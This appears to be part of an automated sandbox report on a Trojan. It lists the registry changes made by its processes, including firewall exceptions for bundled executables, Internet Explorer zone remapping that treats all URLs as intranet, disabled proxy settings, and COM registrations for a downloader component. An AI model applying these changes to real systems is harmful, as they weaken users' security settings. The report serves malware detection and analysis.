[HKCU\Software\Tencent\QQBrowser\Launch]
"InstallQuickSetting" = "0"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"DefaultBrowserFirstRun" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"DisplayName" = "QQÃƒÂ¦Ã‚ÂµÃ‚ÂÃƒÂ¨Ã‚Â§Ã‹â€ ÃƒÂ¥Ã¢â€žÂ¢Ã‚Â¨7.7"
"DisplayIcon" = "%Program Files%\Tencent\QQBrowser\app.ico"

[HKCU\Software\Tencent\QQBrowser\Launch]
"Learned" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Tencent\QQBrowser]
"(Default)" = "%Program Files%\Tencent\QQBrowser"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 07 D4 88 EF DB 50 82 DD E4 D9 56 EB A0 C4 C7"

[HKLM\SOFTWARE\Tencent\QQBrowser]
"EXE" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"NewInstall" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"URLInfoAbout" = "http://www.qq.com"

[HKCU\Software\Tencent\QQBrowser\Launch]
"EducationUrl" = "http://browser.qq.com/new/qb7.7.html"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"EnableUEData" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Tencent\QQBrowser]
"bugreport.exe" = "%Program Files%\Tencent\QQBrowser\BugReport.exe:*:Enabled:QQBrowserBugReport"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Liveup\Temp]
"QQBrowserLiveup.exe" = "%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Liveup\Temp\QQBrowserLiveup.exe:*:Enabled:QQBrowserLiveup"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Tencent\QQBrowser]
"QQBrowser.exe" = "%Program Files%\Tencent\QQBrowser\QQBrowser.exe:*:Enabled:QQBrowser"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Tencent\QQBrowser\Launch]
"EnableUEData"

The process BDDownloader.exe:2920 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 58 79 9A 66 34 48 C8 98 DE 71 F6 E9 CB B1 C1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process mscorsvw.exe:1912 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"

The process %original file name%.exe:1268 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh7F.tmp\%original file name%.exe,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 8B 12 4A AF 10 8F FB 94 A3 26 2B 6A AF CA 20"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1312 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 A4 13 A6 25 50 54 8E E7 9A B1 E3 4D DB 16 5D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Internet Explorer]
"iexplore.exe" = "Internet Explorer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:2964 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\TypeLib]
"(Default)" = "{5FD70451-714E-495A-9F17-450AEF3AA35E}"

[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Tencent\QQBrowser"

[HKCR\WEBPFilter.CoWEBPFilter]
"(Default)" = "WEBPFilter CoWEBPFilter"

[HKCR\WEBPFilter.CoWEBPFilter\CurVer]
"(Default)" = "WEBPFilter CoWEBPFilter.1"

[HKCR\WEBPFilter.CoWEBPFilter.1\CLSID]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"

[HKCR\MIME\Database\Content Type\image/webp]
"CLSID" = "{25336920-03F9-11cf-8FD0-00AA00686F13}"

[HKCR\AppID\WebpDecodeFilter.DLL]
"AppID" = "{A629F59C-66C9-4775-901A-A017530E3958}"

[HKCR\.webp]
"Content Type" = "image/webp"

[HKCR\WebpDecodeFilter.WebpImageDecodeFilt.1\CLSID]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\ProgID]
"(Default)" = "WEBPFilter.CoWEBPFilter.1"

[HKCR\WEBPFilter.CoWEBPFilter.1]
"(Default)" = "WEBPFilter CoWEBPFilter"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}]
"(Default)" = "WEBPFilter.CoWEBPFilter"

[HKCR\MIME\Database\Content Type\image/webp]
"Image Filter CLSID" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"

[HKCR\WebpDecodeFilter.WebpImageDecodeFilt.1]
"(Default)" = "WebpImageDecodeFilter Class"

[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}]
"(Default)" = "IWebpImageDecodeFilter"

[HKCR\WebpDecodeFilter.WebpImageDecodeFilter]
"(Default)" = "WebpImageDecodeFilter Class"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\VersionIndependentProgID]
"(Default)" = "WEBPFilter.CoWEBPFilter"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}]
"AppID" = "{A629F59C-66C9-4775-901A-A017530E3958}"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\TypeLib]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"

[HKCR\.webp]
"PerceivedType" = "image"

[HKCR\MIME\Database\Content Type\image/webp\bits]
"0" = "04 00 00 00 FF FF FF FF 52 49 46 46"

[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 69 2F D6 BC D7 B2 D4 5E 59 A4 2A 2F D5 1A A7"

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\InprocServer32]
"(Default)" = "%Program Files%\Tencent\QQBrowser\WebpDecodeFilter.dll"

[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\TypeLib]
"Version" = "1.0"

[HKCR\AppID\{A629F59C-66C9-4775-901A-A017530E3958}]
"(Default)" = "WebpDecodeFilter"

[HKCR\WEBPFilter.CoWEBPFilter\CLSID]
"(Default)" = "{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}"

[HKCR\WebpDecodeFilter.WebpImageDecodeFilter\CLSID]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"

[HKCR\WebpDecodeFilter.WebpImageDecodeFilter\CurVer]
"(Default)" = "WebpDecodeFilter.WebpImageDecodeFilt.1"

[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0\0\win32]
"(Default)" = "%Program Files%\Tencent\QQBrowser\WebpDecodeFilter.dll"

[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\MIME\Database\Content Type\image/webp]
"Extension" = ".webp"

[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0]
"(Default)" = "webpdecodefilter 1.0 Type Library"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\TypeLib]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\InprocServer32]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\VersionIndependentProgID]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\ProgID]

The process regsvr32.exe:3480 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 1D D9 DE 98 EA 9E C0 F5 00 DD 1B 72 85 5E 07"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bdcomproxy.dll"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"

The process cacls.exe:2376 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 79 79 68 1F 5C EC A5 1D C1 28 ED 2A A7 86 96"

The process MYLogger.exe:504 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ]
"MYLogger.exe" = "MYLogger"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 16 4C 41 7C 89 A5 97 E9 2E A3 7D F1 93 D7 19"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process MYLogger.exe:864 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 31 B9 B2 2B 6D C0 37 74 E9 2D EA 31 D5 6E F0"

The process netsh.exe:3436 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 94 A5 A8 C6 E4 B2 77 CC AB C3 BF 94 66 41 70"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

